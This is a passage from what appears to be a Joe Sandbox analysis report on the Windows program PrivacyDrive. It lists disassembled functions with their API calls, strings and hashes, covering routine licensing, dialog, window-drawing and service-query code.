                                • Instruction ID: b99075d67880d150db95fea7b3dcd8c5b43d8aaeab710f2ffcf1315b80218124
                                • Opcode Fuzzy Hash: 246aa87afa2c323b5010a2bf15a9e526ae3d67f439db5891a926733130d192ad
                                • Instruction Fuzzy Hash: 78217F71781705ABEA14B7729D46FB67BA8BB44B46F04403BB649D72C1EEE4F800CB25
                                Function 004339D0 Relevance: 16.6, APIs: 6, Strings: 5, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004339E0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004339F8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 00433A25
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00433A37
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 00433A64
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00433A76
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PM_HEIGHT$PM_SHADOW_WIDTH$PM_WIDTH$REGISTRATION_REMINDER_MINI
                                • API String ID: 904232820-628402293
                                • Opcode ID: 8a303dbc6a08b9b230a55dcd491f9a9239ec8858bbadb16582f74529764b6ef1
                                • Instruction ID: 01a4af7a8983b9cbc0bae47a87f88d331cf5c0f129bfaf1372eb488655e116fa
                                • Opcode Fuzzy Hash: 8a303dbc6a08b9b230a55dcd491f9a9239ec8858bbadb16582f74529764b6ef1
                                • Instruction Fuzzy Hash: 192153713807056BEA14F7769C62FAB6A98BB44B46F04002EB689D72C0EAD4FC00CB65
                                Function 004B3AC0 Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 453COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: %02X$LicenseInfo$PrivacyDrive$aes$t=X$xml version="1.0" encoding="utf-8" standalone="yes"
                                • API String ID: 0-1655645018
                                • Opcode ID: a44a90f908ebdff796c13cb356e8ed58c53c1e7706bd49559dd09e8cb5c64126
                                • Instruction ID: 2b40ced9dc77dbca4e0f24fa77658248ffcf90a1b38b045d79637e8b98031ac3
                                • Opcode Fuzzy Hash: a44a90f908ebdff796c13cb356e8ed58c53c1e7706bd49559dd09e8cb5c64126
                                • Instruction Fuzzy Hash: EE128271D003599BEB21EF55CC49BDEBBB8AF04304F5041AAE409BB282D7745B88CF65
                                Function 004B3610 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 309fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00477BE0: FindFirstFileW.KERNEL32(?,?,7563D392,005BE234,00000000), ref: 00477CC7
                                • FindClose.KERNEL32(00000000,7563D392,0040FFE5,005BE234,?,?,?,0054A882,000000FF,?,004B424C,?), ref: 004B3687
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004B3720
                                • CloseHandle.KERNEL32(?,00000000), ref: 004B3A2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseFileFind$FirstHandleRead
                                • String ID: LicenseInfo$PrivacyDrive$ProgramVerify.cpp$aes
                                • API String ID: 4236138798-3904884426
                                • Opcode ID: 94fa29a9087f1a3de13979d77d1479f5723d2687f2186e487e5949012d2993bc
                                • Instruction ID: 0ecdb5307493fc99b76f6c23da6f250795bab4ac0021707581e64cc097c89d38
                                • Opcode Fuzzy Hash: 94fa29a9087f1a3de13979d77d1479f5723d2687f2186e487e5949012d2993bc
                                • Instruction Fuzzy Hash: 94C1F7719012189BEB20DF65CC4AFEEBB78AF04715F1041AEE509772C1EB78AB44CB65
                                Function 004125B0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 192COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: !@$%c:$0016$0022$0029$[
                                • API String ID: 0-2905711024
                                • Opcode ID: 7b0af9b6475e3d6ed52d944d25ade539a5fc2cbe0f786ecbc94d860d8d141453
                                • Instruction ID: ee1b57b2201dcb178891f03c976f8cd6469f735d9dab38513d8f865263f43e2c
                                • Opcode Fuzzy Hash: 7b0af9b6475e3d6ed52d944d25ade539a5fc2cbe0f786ecbc94d860d8d141453
                                • Instruction Fuzzy Hash: 3C71CF71A10208AFDB10DFA4DD46BEEBBB4FB08714F14462AF521A73D0D7B86944CBA5
                                Function 004726D0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 188COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 00472710
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 00472730
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00472761
                                • GdipMeasureString.GDIPLUS(00000000,00000010,000000FF,00000000,00000000,00000000,00000000,00000000,?), ref: 0047285F
                                • GdipMeasureString.GDIPLUS(00000000,-00000028,000000FF,00000000,00000000,00000000,00000000,00000000,?), ref: 004728C2
                                • ReleaseDC.USER32(00000000,?), ref: 00472913
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00472922
                                • GdipDeleteGraphics.GDIPLUS(?), ref: 00472934
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormatMeasure$FromGraphicsRelease
                                • String ID: L
                                • API String ID: 3577886877-2909332022
                                • Opcode ID: 1f1e4dc9e29e55b5343837b4a5243709e87b2aef5f2b695d40084e771580aa2d
                                • Instruction ID: bce8b58071e995fc69a8caed146b6afefa0788b2437d3f69981ee98452df7f17
                                • Opcode Fuzzy Hash: 1f1e4dc9e29e55b5343837b4a5243709e87b2aef5f2b695d40084e771580aa2d
                                • Instruction Fuzzy Hash: B67159B16083419FD314CF28C984B5BBBE5FF89304F018A1DF8959B2A0E7B5E904CB92
                                Function 00401500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 175windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetClassNameW.USER32(?,00000000,-00000001), ref: 004015CC
                                • GetWindowTextW.USER32(?,00000000,-00000001), ref: 0040165A
                                • _wcsstr.LIBCMT ref: 0040166D
                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00401680
                                • EnumChildWindows.USER32(?,Function_00001420,?), ref: 004016AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ChildClassEnumMessageNamePostTextWindowWindows_wcsstr
                                • String ID: !@$%c:\$CabinetWClass$ExploreWClass
                                • API String ID: 871461574-603653411
                                • Opcode ID: b38e0aca2129a68135e6c9f3b7786b7596dbd0a197b37821394c374c46dc5b0a
                                • Instruction ID: 92e805b7985315f1fa8a27059a547264e3897f5ee9ff3543a7cff48fe8435982
                                • Opcode Fuzzy Hash: b38e0aca2129a68135e6c9f3b7786b7596dbd0a197b37821394c374c46dc5b0a
                                • Instruction Fuzzy Hash: 4D615EB1900208ABEB10DF94CD557EFBBB5FF14318F144529E801B7391D77AAA48CBA5
                                Function 004EC350 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 159memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,000000D8), ref: 004EC3D8
                                • GdipSetStringFormatTabStops.GDIPLUS(000000D8,?,00000003,00000130), ref: 004EC4D0
                                • GdipSetStringFormatTrimming.GDIPLUS(000000D8,00000001,?,00000003,00000130), ref: 004EC4E1
                                • GdipSetStringFormatFlags.GDIPLUS(000000D8,00000800,?,00000003,00000130), ref: 004EC4F5
                                • GetDC.USER32(00000000), ref: 004EC61C
                                • GdipAlloc.GDIPLUS(00000008,?,00000003,00000130), ref: 004EC62A
                                • GdipCreateFromHDC.GDIPLUS(?,?,?,00000003,00000130), ref: 004EC64E
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005,?,00000003,00000130), ref: 004EC66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$Create$AllocFlagsFromHintRenderingStopsTextTrimming
                                • String ID: < DxSEdit >
                                • API String ID: 3797223327-2588429245
                                • Opcode ID: 6d9013437e44260c65e330b9970983054c444e9d8ceaa8df436844f00a91d111
                                • Instruction ID: e8f1680d67db8f29540a1298256c817737279cadc3365bd7b0a6e481383b9cf8
                                • Opcode Fuzzy Hash: 6d9013437e44260c65e330b9970983054c444e9d8ceaa8df436844f00a91d111
                                • Instruction Fuzzy Hash: 5E91E0B0601B46EFE718CF24C9697DAFFA4FB05308F108619D4689B280D7BA6568DFD4
                                Function 004181B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004D44A0: VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,004A0394,7563D392), ref: 004D44B4
                                  • Part of subcall function 004D44A0: GetCurrentProcess.KERNEL32(?,00000014), ref: 004D4512
                                  • Part of subcall function 004D44A0: FlushInstructionCache.KERNEL32(00000000), ref: 004D4519
                                  • Part of subcall function 00417CF0: EnterCriticalSection.KERNEL32(005BDCE4,?,?,004B0DAD,0041820C,7563D392,?,?), ref: 00417D00
                                  • Part of subcall function 00417CF0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?), ref: 00417D18
                                  • Part of subcall function 00417CF0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH,?,?), ref: 00417D45
                                  • Part of subcall function 00417CF0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?), ref: 00417D57
                                  • Part of subcall function 00417CF0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH,?,?), ref: 00417D84
                                  • Part of subcall function 00417CF0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?), ref: 00417D96
                                • GetDesktopWindow.USER32 ref: 00418222
                                • IsWindowEnabled.USER32(004B0DAD), ref: 0041822D
                                • SendMessageW.USER32(004B0DAD,0000000A,00000000,00000000), ref: 0041823E
                                • EnableWindow.USER32(004B0DAD,00000000), ref: 00418247
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0041828A
                                • SetWindowPos.USER32(00000000,?,?), ref: 0041834F
                                • SendMessageW.USER32(004B0DAD,0000000A,00000001,00000000), ref: 00418365
                                • EnableWindow.USER32(004B0DAD,00000001), ref: 0041836E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Window$EnterLeave$EnableMessageSend$AllocCacheCurrentDesktopEnabledFlushInfoInstructionParametersProcessSystemVirtual
                                • String ID: cbfx_SplashWnd
                                • API String ID: 1587869636-1958384472
                                • Opcode ID: 99b6264c33b8edd2d07a385b3ea17fa264ebd3c6cf1608d8771d251598003c9b
                                • Instruction ID: 3cf59c8892adc52d45e67691539f7b64612a81ef1155bc98daa200ef4ba26f56
                                • Opcode Fuzzy Hash: 99b6264c33b8edd2d07a385b3ea17fa264ebd3c6cf1608d8771d251598003c9b
                                • Instruction Fuzzy Hash: 2A515A71A00314AFEB10CF64CC55FAAB7B4FF49704F14469AFA09A72D0DBB5A944CB94
                                Function 0041D5D0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,0041041F,?,00000000), ref: 0041D5DF
                                • OpenServiceW.ADVAPI32(00000000,PrivacyDrive,000F01FF,?,?,?,0041041F,?,00000000), ref: 0041D5FB
                                • CloseServiceHandle.ADVAPI32(0041041F,?,?,?,0041041F,?,00000000), ref: 0041D623
                                • OpenServiceW.ADVAPI32(00000000,PDSvc,000F01FF,?,?,?,0041041F,?,00000000), ref: 0041D635
                                • CloseServiceHandle.ADVAPI32(0041041F,?,?,?,0041041F,?,00000000), ref: 0041D657
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041041F,?,00000000), ref: 0041D65A
                                  • Part of subcall function 0041CDA0: QueryServiceStatus.ADVAPI32(00000000,?,00000000,?,?,?,0041D649), ref: 0041CDCC
                                  • Part of subcall function 0041CDA0: QueryServiceStatus.ADVAPI32(00000000,?,00000000,75A90460,?,?,?,0041D649), ref: 0041CDE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041041F,?,00000000), ref: 0041D669
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$Open$QueryStatus$Manager
                                • String ID: PDSvc$PrivacyDrive
                                • API String ID: 3801983163-1250294606
                                • Opcode ID: ee8ba61a779bb7c552862b1ce06a56b1350a7c212425bb75d4c7fdf4fe3d6882
                                • Instruction ID: f5ad83e4ce3b08594db57bd147820be98746d85e02aa9721d6382146c0f6d350
                                • Opcode Fuzzy Hash: ee8ba61a779bb7c552862b1ce06a56b1350a7c212425bb75d4c7fdf4fe3d6882
                                • Instruction Fuzzy Hash: 0F11E932B42215679A105B786C499BEBBA8DB82775B100366FD1CE32D0DE69DC00E294
                                Function 004EF0E0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 25libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNEL32(Dwmapi.dll,004013E5), ref: 004EF0FA
                                • GetProcAddress.KERNEL32(00000000,DwmEnableComposition), ref: 004EF116
                                • GetProcAddress.KERNEL32(DwmExtendFrameIntoClientArea), ref: 004EF128
                                • GetProcAddress.KERNEL32(DwmSetWindowAttribute), ref: 004EF13A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: @[$DwmEnableComposition$DwmExtendFrameIntoClientArea$DwmSetWindowAttribute$Dwmapi.dll
                                • API String ID: 2238633743-2065916801
                                • Opcode ID: 20efdd21f22bce50ed8309cc7d8d424ddc0757134462b64042f10ba2789c9e79
                                • Instruction ID: 758a266aad549dc443860feb06a9b5d9908e91e524c95404062e84539075d43a
                                • Opcode Fuzzy Hash: 20efdd21f22bce50ed8309cc7d8d424ddc0757134462b64042f10ba2789c9e79
                                • Instruction Fuzzy Hash: 34F01C74E41355AADF506F36AC1A4853FF8B72970035C0B27A804B3260FBB4A448EF57
                                Function 00431360 Relevance: 15.2, APIs: 10, Instructions: 199sleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 004313A4
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 004313F8
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • QueryPerformanceFrequency.KERNEL32(?,0053E548,000000FF), ref: 0043140B
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00431439
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0043143F
                                • GetDC.USER32 ref: 0043150C
                                • UpdateLayeredWindow.USER32(?,00000000,?,?,?,00000000,00000000,00000000,00000002), ref: 00431535
                                • ReleaseDC.USER32(00000000,00000000), ref: 0043153E
                                • Sleep.KERNEL32(0000000A), ref: 00431546
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00431550
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: PerformanceQuery$Counter$Window$ExceptionException@8FrequencyGdipLayeredModeRaiseRectReleaseSleepSmoothingThrowUpdate
                                • String ID:
                                • API String ID: 647198111-0
                                • Opcode ID: 96f2cfd042a5900a28ded7a8662c8d404411b6d86c7475caafb7818d653a449f
                                • Instruction ID: fea068c4364ea2304a375a6ee7bc06aea74c7dd64ec75d3df016ab5795cc0e07
                                • Opcode Fuzzy Hash: 96f2cfd042a5900a28ded7a8662c8d404411b6d86c7475caafb7818d653a449f
                                • Instruction Fuzzy Hash: 2F91237590020D9FDB11DFA8D858BEEBBB9FF48300F10422AE915B7261DB35A949CF50
                                Function 0041E2B0 Relevance: 15.2, APIs: 10, Instructions: 179COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 0041E2E0
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0041E2FE
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041E32D
